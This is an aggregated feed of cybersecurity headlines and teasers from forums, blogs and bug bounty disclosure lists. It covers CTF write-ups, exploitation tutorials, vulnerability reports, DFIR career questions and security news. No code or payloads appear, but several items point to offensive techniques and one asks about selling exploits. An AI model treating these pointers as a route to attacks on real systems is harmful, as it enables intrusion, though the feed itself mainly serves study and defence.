    Summary of the espionage-related news stories for the Week 35 (28 August-3 September) of 2022. Continue reading on Medium »
    OSINT techniques for pre-sales
    Open-source intelligence (OSINT) is the collection and analysis of data gathered from open sources (overt and publicly available sources)… Continue reading on Medium »
  • Open

    Looking for complete original Dallas TV show HD
    https://www.imdb.com/title/tt0077000/ submitted by /u/Ricardoies [link] [comments]

  • Open

    Phoenix Challenges -- Stack One
    Hi everyone, my writeup for the Phoenix CTF Challenges, Stack One is now live on my blog https://secnate.github.io/ctf/phoenix/phoenix-stack-one/ Any feedback would be most welcome! submitted by /u/ProgrammingBro123 [link] [comments]
    Browser Exploitation Introduction
    submitted by /u/soupcreamychicken [link] [comments]
    I see some PoCs run Calc.exe. When selling an exploit, is running calc enough or do you need to run other things?
    submitted by /u/soupcreamychicken [link] [comments]
    Is vulns-sec market valid?
    https://vulns-sec.com/ https://twitter.com/vulns_sec submitted by /u/soupcreamychicken [link] [comments]
  • Open

    Thick Client Pentest: Modern Approaches and Techniques: PART 1
    No content preview
    Exploiting OAuth authentication vulnerabilities Part II
    No content preview
    Hack With SQL Injection Attacks! DVWA high security — StackZero
    No content preview
  • Open

    Arti 1.0.0: Rust Tor implementation is ready for production use
    submitted by /u/sanitybit [link] [comments]
    Fun with Windows Containers - Popping Calc
    submitted by /u/sanitybit [link] [comments]
    Chromeloader browser hijacker
    submitted by /u/CyberMasterV [link] [comments]
    Practical guide for Golden SAML
    submitted by /u/sanitybit [link] [comments]
    Reviewing macOS Unified Logs
    submitted by /u/sanitybit [link] [comments]
  • Open

    TRUTHTRACER
    TRUTHTRACER: This mountain, the one with the jagged peak, at 40.378279, 46.728738 — could that be the one from the third photo? Continue reading on Medium »
    How to Find Flag on CTF.MY.ID
    ctf.my.id is an Indonesian CTF to celebrate Indonesia’s independence day Continue reading on Medium »
    Dialogues From Atlantis Writeup
    Listen carefully, some texts hold deep secrets Continue reading on The Sleuth Sheet »
    The Open Source Intelligence Analysis Bookshelf
    This list of books is a great way to start your Open Source Intelligence learning journey. Continue reading on The Sleuth Sheet »
  • Open

    SecWiki News 2022-09-03 Review
    No news updated today~ For more recent articles, visit SecWiki
  • Open

    Hacking Wireless Networks around the Globe.(Practical WIFI Hacking)
    How to hack wireless networks. Continue reading on System Weakness »
    Discovery of CVE-2022-35406
    On 11th April 2022, it was a regular day for me. I went to the office & started my daily activities. Continue reading on Medium »
    YouTube Impact on Bug Bounty Hunters :)
    In this part I’m going to show you the impact of YouTube on bug bounty hunters with my best bug report … Continue reading on Medium »
    Exploiting Stack-based Buffer Overflow on Windows x64 | Step by Step explanation | Part-1
    Hello Security folks, in the previous article we came to know about CPU registers and the structure of the stack, which will help us… Continue reading on Medium »
  • Open

    What are writing reports like?
    How long are they typically and how much time do they take up? Are they exceedingly repetitive, with little to no thought required? submitted by /u/victorMemer5 [link] [comments]
    What does a typical career in pentesting look like?
    What will my week be like? If I love problem-solving and working for long periods of time, will I be in luck or will I simply only be needed every once in a while? If the latter is true, what do I do in between my services? What kind of social situations should I expect? Any and all feedback is greatly appreciated, thank you! submitted by /u/victorMemer5 [link] [comments]
  • Open

    path traversal vulnerability in Grafana 8.x allows " local file read "
    MTN Group disclosed a bug submitted by a-heybati: https://hackerone.com/reports/1427086
    Unauthenticated SSRF in 3rd party module "cerdic/csstidy"
    Nextcloud disclosed a bug submitted by eg42: https://hackerone.com/reports/1595006 - Bounty: $250
    Brute force protections don't work
    Nextcloud disclosed a bug submitted by nickvergessen: https://hackerone.com/reports/1596918
    Password disclosure in initial setup of Mail App
    Nextcloud disclosed a bug submitted by anna_larch: https://hackerone.com/reports/1561471
    Federated share accepting/declining is not logged in audit log
    Nextcloud disclosed a bug submitted by rtod: https://hackerone.com/reports/1200815
    Weak/Auto Fill Password
    MTN Group disclosed a bug submitted by harrisoft: https://hackerone.com/reports/817331
  • Open

    Analysis: Situational Awareness + Timelines
    I've talked and written about timelines as an analysis process for some time, in both this blog and in my books, because I've seen time and again over the years the incredible value in approaching an investigation by developing a timeline (including mini- and micro-timelines, and overlays), rather than leaving the timeline as something to be manually created in a spreadsheet after everything else is done. Now, I know timelines can be "messy", in part because there's a LOT of activity that goes on on a system, even when it's "idle", such as Windows and application updates. This content can "muck up" a timeline and make it difficult to distill the malicious activity, particularly when discerning that malicious activity is predicated solely on the breadth of the analyst's knowledge and experi…
    LNK Builders
    I've blogged a bit...okay, a LOT...over the years on the topic of parsing LNK files, but a subject I really haven't touched on is LNK builders or generators. This is actually an interesting topic because it ties into the cybercrime economy quite nicely. What that means is that there are "initial access brokers", or "IABs", who gain and sell access to systems, and there are "RaaS" or "ransomware-as-a-service" operators who will provide ransomware EXEs and infrastructure, for a price. There are a number of other for-pay services, one of which is LNK builders. In March, 2020, the Checkpoint Research team published an article regarding the mLNK builder, which at the time was version 2.2. Reading through the article, you can see that the building includes a great deal of functionality, there's …
  • Open

    GCFA Passed 2nd of September 2022
    Dear community, I'd love to share this great achievement with you. After 3 months of hard work I was able to obtain the GCFA on the 1st attempt. I'm working in the IR team and I do have 4 years of experience within the field. Nevertheless I need to admit that overall the FOR 508 course was pretty exciting and I enjoyed it a lot. From my perspective the final exam was a bit harder than the 2 practice exams provided within the course; I have to say that the difficulty was raised by a notch. As mentioned multiple times before, they are primarily testing your understanding of the concepts; the index/notes help but do not rely on them completely. I would say do the training, get through the labs 2 times, use the MP3s provided with the training. Read the books and work hard; hard work pays off, trust me. I wish all the best to all the people who have already passed this beast and also to all the future students of this class. submitted by /u/_KATER_
  • Open

    Advanced BPF Notes (5): Several TCP-related BPF Types (sockops, struct_ops, header options)
    A collection of TCP-related BPF material, mainly drawn from talks given by Facebook and Google. About the "Advanced BPF Notes" series: these were compiled while studying and using BPF. Since they are notes rather than a tutorial, the content does not aim for continuity; readers who already have the basics can use them to fill gaps. Unless otherwise stated, the code in this article is based on kernel 5.10. Advanced BPF Notes (1): BPF program (BPF Prog) types in detail: use cases, function signatures, execution points and example programs. Advanced BPF Notes (2): BPF Map types in detail: use cases, example programs. Advanced BPF Notes (3): BPF Map kernel implementation. Advanced BPF Notes (4): Debugging BPF programs. Advanced BPF Notes (5): Several TCP-related BPF types (sockops, struct_ops, header options). About the "Advanced BPF Notes" series 1 Socket-related types: sockops 1.1 Technical background 1.2 Design motivation 1.3 Characteristics (especially how they differ from earlier BPF program types) 1.4 Categories of ops 1.5 Implementation overview: struct bpf_sock_ops; struct bpf_sock_ops_kern: tcp_call_bpf(); the two kinds of sock_ops; BPF helper functions 1.6 Example 2 TCP congestion control (CC) 2.1 struct struct_ops 2.2 Congestion control algorithms: C and BPF implementations 2.3 Loading and enabling a new CC algorithm: loading via libbpf; loading via bpftool; enabling via sysctl; enabling via setsockopt() 2.4 Performance 3 TCP header options 3.1 Requirements 3.2 Example 4 struct sk_storage: per-socket local storage …

  • Open

    PII Leakage via IDOR
    Greetings researchers, this is a brief writeup on one of my most recent discoveries regarding a bug bounty programme. Let’s educate… Continue reading on Medium »
    Welcome Angle Protocol!
    We are super excited to welcome Angle Protocol to the Hats ecosystem! We look forward to helping them add a layer of security to their… Continue reading on Medium »
    FUZZING 101 ..
    Hi, I am back with another blog, and in this one we will be learning about Fuzzing. I was about to write on fuzzing binaries or exe's but thought… Continue reading on Medium »
    The Cod Caper(Tryhackme) Walk through
    In this tryhackme room we learn some enumeration and a little bit about the buffer overflow vulnerability. Continue reading on Medium »
    Exploiting OAuth authentication vulnerabilities Part II
    Today I will show some techniques that can be used to exploit OAuth 2.0 and possibly allow an attacker to take over the victim's account… Continue reading on InfoSec Write-ups »
    Latest Open Source Bug Bounty Projects Launched by Google to Control Supply Chain Attacks
    Last Monday, Google introduced its latest Open-Source Bug Bounty Projects, paving the way for bug bounty hunters for a payout ranging… Continue reading on Medium »
    The Database Handover | A Dumb Mistake | Critical BUG
    Hi hackers & Security Enthusiasts, I’m Saransh Saraf and this is a simple bug with a critical Impact. I hope you’ll enjoy it and learn… Continue reading on Medium »
    21 cybersecurity search engines:
    1. Shodan — Search for devices connected to the internet. 2. Wigle — Database of wireless networks, with statistics. 3. Grep App — Search… Continue reading on Medium »
    39 cybersecurity news resources:
    1. IT Security Guru 2. Security Weekly 3. The Hacker News 4. Infosecurity Magazine 5. CSO Online 6. The State of Security — Tripwire 7… Continue reading on Medium »
  • Open

    Note and Documenting
    Has anyone used software that can timestamp as you document? Something that displays a time stamp every time you press enter to start a new line. submitted by /u/derekdoes1t
    Nuances of the financial sector
    I've worked the majority of my career in the electricity generation space. I can tell you all about securing OT, especially power-related OT. I can tell you all about the Purdue model, etc. I'm moving to a fintech/bank soon. People who have worked cybersecurity in the financial sector (banks, insurance, fintech, etc.): what would you recommend learning about/reading/etc. to get familiar (or even become a cybersecurity expert) in the financial sector? For example, is the Open Banking API worth learning about? submitted by /u/Itchy-Criticism-5470
  • Open

    Book Review: Red Team Development and Operations: A practical guide
    Red Team Development and Operations Continue reading on Medium »
  • Open

    There’s Another Hole In Your SoC: Unisoc ROM Vulnerabilities as used in the Motorola Moto E40 / Teclast T40 5G etc. - disclosure timeline is a thing of wonder
    submitted by /u/digicat
    Windows Firmware Attack Surface Reduction (FASR)
    submitted by /u/sanitybit
    curl’s TLS fingerprint
    submitted by /u/sanitybit
    iPhone 11 w/ iBoot & iOS16 emulated on QEMU
    submitted by /u/sanitybit
    GraphQL Batching Attacks: Turbo Intruder
    submitted by /u/_rs
    CVE-2021-38406 or CISA KEV Catalog Lacks Accountability
    submitted by /u/chicksdigthelongrun
    So You Wanna Pwn The Kernel?
    submitted by /u/_rs
    Source Code Management Attack Toolkit - Supports GitHub Enterprise, GitLab Enterprise, & Bitbucket Server
    submitted by /u/sanitybit
    More SRE Lessons for SOC: Release Engineering Ideas
    submitted by /u/sanitybit
  • Open

    SecWiki News 2022-09-02 Review
    Observations on the Cybersecurity Vulnerability Landscape in the First Half of 2022 by ourren. For more of the latest articles, visit SecWiki
  • Open

    How would you spend 5k training budget
    My Director just informed me I have 5k I can spend on training (conferences, certs, training etc.) this year, and I've been wanting to learn more about DFIR and eventually transition into the field. Do I try for SANS (org is a REN-ISAC member so there are some discounts available, I believe)? Go for IACIS? Background: Higher Ed field, Bachelor's in Information Technology, CISA, CDPSE, CIPM, Sec+, SSCP, ITILv4 Foundations. I've performed one "investigation" related to misuse of funds where I observed chain of custody and imaged several Mac devices, then later looked for evidence using Autopsy. Thanks in advance for any advice. submitted by /u/youkoflame
  • Open

    CDC- writeup
    What is XSS? How does it work? Continue reading on Medium »
    Hackbaku-Writeup
    Continue reading on Medium »
  • Open

    music and random images
    http://falsesoul.com submitted by /u/NavaShieldWasTaken
    Httrack usage
    Hey folks. So after trying wget I feel it's a bit of a nightmare to get working. In a lot of circumstances it doesn't work or downloads in a very obscure way. Attempting to do a super large directory using httrack but struggling to work out what is wrong. Checking over the hts-log.txt file there are zero errors. Previous to this I did get errors on the directory due to the implied security limitations if you are not using the param --disable-security-limits. Previously the cache claimed that files were being throttled at a specific size and there was a mismatch error. Now there are zero errors but file sizes seem to be even smaller than before. At a loss as to what is happening; is this just the way it downloads? There are circa 1200 files each of around 3GB in size. Do I need to wait for it to "round robin" these files to be completed? I've no idea about how the parallelism will work with this. Any insight into this would be fantastic. Thanks. submitted by /u/MaxSan
  • Open

    Shellcode Injection Techniques in C#
    Process Injection in C# https://crypt0ace.github.io/posts/Shellcode-Injection-Techniques/ submitted by /u/Potential_Waltz7400
  • Open

    Detection and Alerting: Selecting a SIEM
    Summary Basic SIEM requirements should be in place to create mature detections for a variety of log sources, including network logs, system logs, and application logs (including custom applications). This focuses on Security Operations and does not include the engineering side of SIEM management, e.g., licensing, hardware/cloud requirements, retention needs, etc. Each component of the... The post Detection and Alerting: Selecting a SIEM appeared first on TrustedSec.
  • Open

    CVE-2021-38406 or CISA KEV Catalog Lacks Accountability
    Article URL: https://attackerkb.com/topics/RHuGSieFJe/cve-2021-38406 Comments URL: https://news.ycombinator.com/item?id=32689158 Points: 2 # Comments: 0
  • Open

    The best films about OSINT
    Have a nice weekend everyone… Continue reading on Medium »
  • Open

    Utkuici — Nessus Automation
    No content preview
  • Open

    Wordpress users disclosure from json and xml file
    MTN Group disclosed a bug submitted by drak3hft7: https://hackerone.com/reports/1408589
  • Open

    FreeBuf Morning Report | Anti-Telecom and Online Fraud Law passed by vote; major VPN providers shut down Indian servers
    The 36th session of the Standing Committee of the 13th National People's Congress voted on September 2 to pass the Anti-Telecom and Online Fraud Law, which will take effect on December 1, 2022.
    FreeBuf Weekly | Google launches open source vulnerability rewards program; reports claim Yonyou and other leading software vendors hit by ransomware
    Happy weekend, Buffers. Here is this week's FreeBuf Weekly, in which we summarize and recommend the week's hot news, security incidents, good reads and handy tools, so that you don't miss any of this week's highlights! Hot news 1. DEF CON: white-hat hackers demonstrate remote control of a retired satellite. At the DEF CON hacker conference on August 20, the white-hat group Shadytel demonstrated live the remote hijacking of a decommissioned satellite and used it to play a movie. 2. Apple discloses serious security vulnerabilities and tops the trending list. According to media reports, Apple
    A first! The Anti-Telecom and Online Fraud Law is passed and takes effect December 1
    China's first Anti-Telecom and Online Fraud Law (hereinafter the Anti-Fraud Law) was passed by vote on September 2 and formally takes effect on December 1.
    Montenegro hit by ransomware attack, hackers demand $10 million
    Critical infrastructure of the Montenegrin government was hit by a ransomware attack, with the hackers demanding a $10 million ransom.
    APT group Evilnum launches a new wave of cyberattacks targeting online trading
    Overview: Recently, NSFOCUS's Fuying Lab captured a series of interrelated phishing campaigns. After analysis, Fuying Lab confirmed that these campaigns come from the APT group Evilnum and are a continuation of the group's recent cyberattack operation DarkCasino. This round of attacks took place from late July to early August. The Evilnum attackers continued to use their usual approach, including .pif and archive-type decoy files, an attack chain built around their in-house trojan DarkMe, and various third-party tools. DarkCasino is
    A full moon of "knowledge" and gifts: surprise entry Easter eggs are now online!
    This Mid-Autumn Festival, the "Co-builder" expedition team makes knowledge more fun.
  • Open

    Ruby Concurrency
    Every time I build an application, I cannot help thinking about concurrency. I consider it important because it is sometimes directly required for implementing functionality and because it can be the factor that decides performance. Personally, I learned various patterns as a university student and applied them in projects, but since I started working, security engineering has been my main job, so in practice the thread-pool pattern has been used overwhelmingly more often than anything else. I wrote about goroutines and sync in Golang a while ago, but I don't think I have written anything separately about Ruby. Today I want to talk about concurrency handling in Ruby. Why Gem? What I am writing about today are approaches that use a Ruby Gem called Concurrent-ruby. Of course you could implement it well enough using only the features the Ruby language provides, but in terms of stability and security that cannot beat a well-built Gem library, so it is better to handle it with a library wherever possible. Concurrent-ruby Concurrent-ruby is a library for concurrency handling in Ruby. It has the commonly used features such as Promise and Async, as well as concurrency patterns such as various thread pools (worker pools) and schedulers. Modern concurrency tools including agents, futures, promises, thread pools, supervisors, and more. Inspired by Erlang, Clojure, Scala, Go, Java, JavaScript, and classic concurrency patterns. Features It supports many features, but a condensed summary is as follows. Used appropriately, they save time compared with implementing them yourself and add stability. Default Async ScheduledTask TimerTask Promises Thread-safe objects, struct, collection, immutable object and struct Thread Synchronization and many more Edge...

  • Open

    Chrome 106 Beta: New CSS Features, WebCodecs and WebXR Improvements, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, ChromeOS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 106 is beta as of September 1, 2022. You can download the latest on Google.com for desktop or on Google Play Store on Android. Origin Trials This version of Chrome supports the origin trials described below. Origin trials allow you to try new features and give feedback on usability, practicality, and effectiveness to the web standards community. To register for any of the origin trials currently supported in Chrome, including the ones described below, visit the Chrome Origin Trials dashboard. To learn more about origin trials in …
  • Open

    GCFA
    Hey everyone, I don’t interact that much besides upvoting and lurk here quite a bit. Just wanted to post that I passed my GCFA. Test was tough but glad it’s over and the certificate was completed! submitted by /u/avenger_of_zendikar
    Creating a File listing of all Files, Directories, and who files are shared with on Google Drive
    Does anybody have a way to do this, or the name of a forensics suite that actually does it correctly? submitted by /u/sanreisei
    For forensic examiners in the US, how long do you keep images/extractions of your devices?
    I have been working digital forensics for my department for almost 4 years now. The issue I am now running into is how long to keep original images of extracted devices. I know that after the investigative process the relevant evidence is exported and reported as evidence, with the rest of the image being sealed away. I do seal the images into offline HDD storage. But I am starting to max out another 8TB drive. I am asking how long people keep the original extractions, or if someone can point to a policy/law that gives me some direction. Thanks in advance submitted by /u/nub_cho
    ASK ALL NON-FORENSIC DATA RECOVERY QUESTIONS HERE
    This is where all non-forensic data recovery questions should be asked. Please see below for examples of non-forensic data recovery questions that are welcome as comments within this post but are NOT welcome as posts in our subreddit: My phone broke. Can you help me recover/backup my contacts and text messages? I accidentally wiped my hard drive. Can you help me recover my files? I lost messages on Instagram, SnapChat, Facebook, etc. Can you help me recover them? Please note that your question is far more likely to be answered if you describe the whole context of the situation and include as many technical details as possible. One or two sentence questions (such as the ones above) are permissible but are likely to be ignored by our community members as they do not contain the information needed to answer your question. A good example of a non-forensic data recovery question that is detailed enough to be answered is listed below: "Hello. My kid was playing around on my laptop and deleted a very important Microsoft Word document that I had saved on my desktop. I checked the recycle bin and it's not there. My laptop is a Dell Inspiron 15 3000 with a 256gb SSD as the main drive and has Windows 10 installed on it. Is there any advice you can give that will help me recover it?" After replying to this post with a non-forensic data recovery question, you might also want to check out r/datarecovery since that subreddit is devoted specifically to answering questions such as the ones asked in this post. submitted by /u/AutoModerator
    Digital Forensics Career Path Questions
    Hello Everyone, I am from the US (PNW) and interested in getting into the Digital Forensics field. Did four years at university, didn't like it, and now I am working on a 2-year degree in IT from my local community college. In my free time, I am doing learning modules on hackthebox academy and participating in live CTF events when I can. I am curious to hear from this community about how I can get my foot in the door in this field. I do not know if what I am doing right now is the ideal path that I should follow, or whether I should focus my time more on specific certifications rather than CTF competitions and cybersecurity fundamentals? I am also wondering if it is a good idea to check with my local PD to see if they have any opportunities? Sorry if this is too off-topic, but talking with people from this community seems to me like a great resource to learn from. Thank You. submitted by /u/abrahr1123
  • Open

    IDOR on TikTok Ads Endpoint
    TikTok disclosed a bug submitted by sinayeganeh: https://hackerone.com/reports/1527906 - Bounty: $2500
    Sensitive Information Disclosure Through Config File
    MTN Group disclosed a bug submitted by dh0pe: https://hackerone.com/reports/1397788
    Default Admin Username and Password on remedysso.mtncameroon.net
    MTN Group disclosed a bug submitted by dh0pe: https://hackerone.com/reports/1397786
    Password reset token leak on third party website via Referer header [cloudivr.mtnbusiness.com.ng]
    MTN Group disclosed a bug submitted by ibrahimatix0x01: https://hackerone.com/reports/1320242
    Remote code execution due to unvalidated file upload
    MTN Group disclosed a bug submitted by aliyugombe: https://hackerone.com/reports/1164452
    API Key reported in #1465145 not rotated and thus is still valid and can be used by anyone
    Adobe disclosed a bug submitted by aneeeketh: https://hackerone.com/reports/1591770
    Remote denial of service in HyperLedger Fabric
    Hyperledger disclosed a bug submitted by fatal0: https://hackerone.com/reports/1635854 - Bounty: $1500
    Any expired reset password link can still be used to reset the password
    Acronis disclosed a bug submitted by mrccrqr: https://hackerone.com/reports/1615790 - Bounty: $100
  • Open

    Top 5 Hacking Tools
    Let’s talk about offensive security! This article will outline some of my favorite tools for hacking into networks, establishing foothold… Continue reading on Medium »
  • Open

    [NSFW] Comic Books and Magazines (nfsw because of Heavy Metal Magazine)
    submitted by /u/SatansMoisture
    Good Spongebob 100% working no virus!
    submitted by /u/Plastic_Preparation1
    Random TV shows non-https
    submitted by /u/littlepreptalk
    excavators
    submitted by /u/PM_ME_TO_PLAY_A_GAME
  • Open

    What is the per case PII data breach fine in UK?
    For example, 1 passport breach of someone's data is ££££? Personally Identifiable Information (PII) Examples. Thank you Reddit. submitted by /u/syswww
  • Open

    SecWiki News 2022-09-01 Review
    The Road to Code Auditing: A White-Box Digger by ourren; Six Methods for Detecting Cisco Device Versions by ourren; Exploration and Practice of a Defense-in-Depth Security System for Commercial Banks by ourren; Building a Security Defense System by ourren; Research on a Cybersecurity Architecture for Next-Generation Data Centers by ourren. For more of the latest articles, visit SecWiki
  • Open

    Fuzz Testing in Go
    Before we go further, we need to know what Fuzz or Fuzzing is. Fuzzing is an automated software testing technique that… Continue reading on Medium »
  • Open

    How To Obtain a Free Shodan Membership
    OSINT DOJO Continue reading on The Sleuth Sheet »
    OSINT Chall #3
    Write-up for the @quiztime Twitter challenge Continue reading on Medium »
    Social Media | OSINT :)
    Foller.me  https://foller.me  Basic Twitter account statistics, interactions and analytics on the last 100 tweets Continue reading on Medium »
    TryHackMe: OhSINT
    Ever wondered how the data you share on the internet could be used to extract sensitive information about you? As a proof of concept, we… Continue reading on Medium »
    Awesome OSINT
    A curated list of amazingly awesome open source intelligence tools and resources. Open-source intelligence (OSINT) is intelligence… Continue reading on Medium »
    How To Use SpiderFoot for Social Media Intelligence
    Overview Continue reading on The Sleuth Sheet »
  • Open

    GitHub - RossGeerlings/tio-ad-sync: Group Syncing between Active Directory and Tenable.io, and Automated Access Control
    submitted by /u/RossGeerlings
    SETTLERS OF NETLINK: Exploiting a limited Use After Free in nf_tables (CVE-2022-32250) against the latest Ubuntu (22.04) and Linux kernel 5.15 -
    submitted by /u/digicat
    How I Met Your Beacon: Detection Strategies
    submitted by /u/sanitybit
  • Open

    TikTok vulnerability allows one-click account compromise
    Article URL: https://arstechnica.com/information-technology/2022/08/microsoft-finds-tiktok-vulnerability-that-allowed-one-click-account-compromises/ Comments URL: https://news.ycombinator.com/item?id=32676624 Points: 2 # Comments: 0
  • Open

    [Cullinan #41] GraphQL, Rails and Jekyll
    This is Cullinan log #41. For an update posted after about two months, there were not many changes. Four new entries were added, and some content, such as smuggling, was expanded. Change Logs New: GraphQL Security; GraphQL Injection; Rails (Ruby on Rails); Jekyll. Update: SRI > Add tool; H2C Smuggling > code and images added; HTTP Request Smuggling > CL.0 case added. What's next? I've been thinking a lot lately about my blog posts and how I run things, so the Cullinan log is also up for reorganization. I'm still deciding whether to keep running it as a new post each time, as before, or to accumulate the history on a single page like a CHANGE LOG; if I decide, I'll share it once more :D Anyway, it's already #41 😮
  • Open

    How should data be backed up to cope with ransomware attacks? | FreeBuf enterprise-side group topic discussion
    Different enterprises take very uneven measures for data backup. What special considerations are involved, and how should data backups be done to cope with ransomware attacks?
    FreeBuf Morning Report | UK issues its strictest-ever telecom operator security rules; US Democrats push Meta over sharing abortion data
    The UK telecom industry's new security framework will take effect in October, making the UK's telecom security regulations among the strictest in the world.
    Reproducing Two Apache Parsing Vulnerabilities and How to Defend Against Them
    The Apache multiple-extension parsing vulnerability and the newline parsing vulnerability.
    TikTok high-severity vulnerability allows one-click account hijacking; company says it has been fixed
    The Android version of TikTok contained a high-severity vulnerability through which attackers could achieve one-click account hijacking, affecting hundreds of millions of users.
    Italian oil giant ENI suffers cyberattack
    Italian oil giant ENI suffered a cyberattack in which attackers compromised its computer network, but the company says the attack did not have a serious impact.
    Exploring new developments in security: the IDC 2022 CSO Global Cybersecurity Summit held successfully
    Under the theme "Uniting for Data Security, Empowering Enterprise Modernization", the summit attracted more than 650 CIOs, CSOs and CISOs attending online and in person.
    Top rewards above 200,000: Google launches open source vulnerability rewards program
    On August 29, Google launched the Open Source Software Vulnerability Rewards Program (OSS VRP), one of the first open-source-specific vulnerability programs.
    First on the web | An In-Depth Reading of the Measures for the Administration of Cybersecurity in Medical and Health Institutions
    Cybersecurity is the foundation of healthcare digitalization; unless that foundation is solid, healthcare digitalization cannot truly take off.
  • Open

    SETTLERS OF NETLINK: Exploiting a limited Use After Free in nf_tables (CVE-2022-32250) against the latest Ubuntu (22.04) and Linux kernel 5.15
    submitted by /u/digicat
  • Open

    Fuzzing with Radamsa
    No content preview
    Mass Hunting CVE’s Part-1
    No content preview
    S3 Bucket: Cloud Trail Log Analysis
    No content preview
    OAuth 2.0 (Introduction and Exploitation Part I)Explained By Hashar Mujahid
    No content preview
  • Open

    List of 50 cybersecurity podcasts:
    1. Cyber Work 2. Click Here 3. Defrag This 4. Security Now 5. InfoSec Real 6. InfoSec Live 7. Simply Cyber 8. OWASP Podcast 9. We Talk… Continue reading on Medium »
    24 cybersecurity newsletters to follow:
    AdvisoryWeek — Security advisory roundups by major vendors. We Live Security — Award-winning news, views and insights. CSO Online — News… Continue reading on Medium »
  • Open

    Hack Windows through Weak Service Permissions
    submitted by /u/Clement_Tino

  • Open

    Password reset tokens sent to CSP reporting endpoints
    Snapchat disclosed a bug submitted by mahfujwhh: https://hackerone.com/reports/1626281 - Bounty: $250
    Enable 2Fa verification without verifying email leads account takeover
    Cloudflare Public Bug Bounty disclosed a bug submitted by motu-vai: https://hackerone.com/reports/1618021 - Bounty: $350
    CVE-2022-35252: control code in cookie denial of service
    curl disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1613943
    Blind SSRF on platform.dash.cloudflare.com Due to Sentry misconfiguration
    Cloudflare Public Bug Bounty disclosed a bug submitted by lohigowda: https://hackerone.com/reports/1467044 - Bounty: $200
  • Open

    A ‘high severity’ TikTok vulnerability allowed one-click account hijacking
    Article URL: https://www.theverge.com/2022/8/31/23329662/tiktok-vulnerability-microsoft-one-click-exploit-high-severity Comments URL: https://news.ycombinator.com/item?id=32669851 Points: 10 # Comments: 1
    Apple Releases iOS 12.5.6 Update for Older Devices with Vulnerability Fixes
    Article URL: https://www.macrumors.com/2022/08/31/apple-releases-ios-12-5-6/ Comments URL: https://news.ycombinator.com/item?id=32667852 Points: 1 # Comments: 0
    Vulnerability in TikTok Android app could lead to one-click account hijacking
    Article URL: https://www.microsoft.com/security/blog/2022/08/31/vulnerability-in-tiktok-android-app-could-lead-to-one-click-account-hijacking/ Comments URL: https://news.ycombinator.com/item?id=32664898 Points: 4 # Comments: 0
  • Open

    Azure DevOps Server segmentation
    Azure DevOps Server development system segmentation best practices: sergiomarotco/Azure-DevOps-Server-segmentation-cheat-sheet submitted by /u/Marotso
    NSA/Gov vs Big4 job offers
    Hi everyone, I recently received two offers in cybersecurity from a Big 4 company and the NSA. For starters, I am fresh out of school with a MIS degree. Initially, I agreed to go with the NSA and already went under the background investigation. However, it’s been over 3 months and I still have not received a final offer and start date from them. Around a week ago, a Big4 firm offered me a position that pays $30,000 more (we’re looking at close to six figures after bonuses, in my first year). Now I am conflicted on what to do. Initially, I thought that the work with the NSA would be more challenging than that of any private sector job. But my friends and family are advising me otherwise. I’ve scrolled through some threads on here about GOV vs Private and most people seem to be saying the opposite of what I expect: that you get more boring work, less incentive and slower promotion with the NSA. Any advice for me? Edit: to add to it, I got an internship with the Big4 firm, and they extended a full-time offer after it ended. So there should be a chance I’m able to reapply for a full-time position without much trouble later on. submitted by /u/Any_Career_4379
    Do you think changing an org's TLD to .GOV is a deterrent or an incentive for the adversary?
    Any other pros/cons? submitted by /u/name1wantedwastaken
  • Open

    AngularJS Client-Side Template Injection: The orderBy Filter.
    Intro: Continue reading on Medium »
    An accidental IDOR story that got me 1st acknowledgment from Nciipc
    $whoami Continue reading on Medium »
    All about CORS Misconfiguration.
    By reading this article you are supposed to learn: Continue reading on System Weakness »
    All about CORS Misconfiguration.
    By reading this article you are supposed to learn: Continue reading on Medium »
    What is API And Why It’s Important to know
    What is API? Continue reading on Medium »
    OAuth 2.0 (Introduction and Exploitation Part I)Explained By Hashar Mujahid
    In this blog, I am going to explain how OAuth 2.0 works and what vulnerabilities can be raised if it is implemented incorrectly. Continue reading on InfoSec Write-ups »
    Rotation IP Address with Burpsuite
    Hi, For those of you who are unfamiliar with what IP Rotation is, I’m going to share a quick tip and trick with you all on how to use… Continue reading on System Weakness »
    Rotation IP Address with Burpsuite
    Hi, on this occasion I'm going to share a simple tip and trick with all of you hacker-men (Red) on how to… Continue reading on Medium »
    ‘PTN’ infosec monthly #3— InfoSec Updates
    Namaste everyone, Welcome to ‘PTN’ infosec monthly #3. We are back with the third newsletter with infosec updates. We started ‘PTN infosec… Continue reading on Pentester Nepal »
    Saving more than 100,000 website from a Watering Hole attack
    Watering hole is a computer attack strategy in which an attacker guesses or observes which websites an organization often uses and infects… Continue reading on Medium »
    Best 26 cybersecurity: YouTube channels
    1. Infosec Institute  — Cybersecurity awareness. 2. Black Hat — Technical cybersecurity conferences. 3. Bugcrowd  — Bug bounty methodology… Continue reading on Medium »
    OWASP Risk Calculator
    OWASP Risk Rating Methodology In general terms, the OWASP Risk Rating Methodology takes us through a series of steps that we can use to calculate… Continue reading on Medium »
  • Open

    Maturity, Effectiveness, and Risk – Security Program Building and Business Resilience
    One of the most common questions asked by business leadership is also one of the most challenging to answer: “How secure are we?” Now, some of you reading this may already be cringing or yelling at your screen that this question on its own shouldn’t have a simple answer with little actionable value. However, when... The post Maturity, Effectiveness, and Risk – Security Program Building and Business Resilience appeared first on TrustedSec.
  • Open

    The-Listeners-Writeup
    Writeup for The Listeners contract, a geo-location CTF offered by tiberianorder.com Continue reading on The Sleuth Sheet »
    OPSEC for OSINT — Basics
    OPSEC stands for Operational Security. OPSEC is a set of principles to follow so that information can’t be gathered from non-involved… Continue reading on The Sleuth Sheet »
    OSINT Chall #2
    Write-up for the @quiztime Twitter challenge Continue reading on Medium »
    OSINT Chall #1
    Write-up for the @quiztime Twitter challenge Continue reading on Medium »
  • Open

    Linux Audit comes at a cost, is that where BPF steps in?
    submitted by /u/Blakebvhjjdd
    MemLabs: Learn Memory Forensics through CTF-styled labs
    submitted by /u/sanitybit
    Vulnerability in TikTok Android app could lead to one-click account hijacking
    submitted by /u/CyberMasterV
    Open source automated AWS CIS v1.5 benchmark assessment just released by Steampipe.io
    submitted by /u/bobtbot
    Announcing the Open Sourcing of Paranoid's Library - Detect well-known weaknesses in large amounts of crypto artifacts, like public keys and digital signatures
    submitted by /u/_rs
    Restricting Libraries in JVM Compute Platforms - Security challenges with Scala and Java libraries
    submitted by /u/_rs
    From Onboarding to Offboarding - Securing GitHub Apps Integration
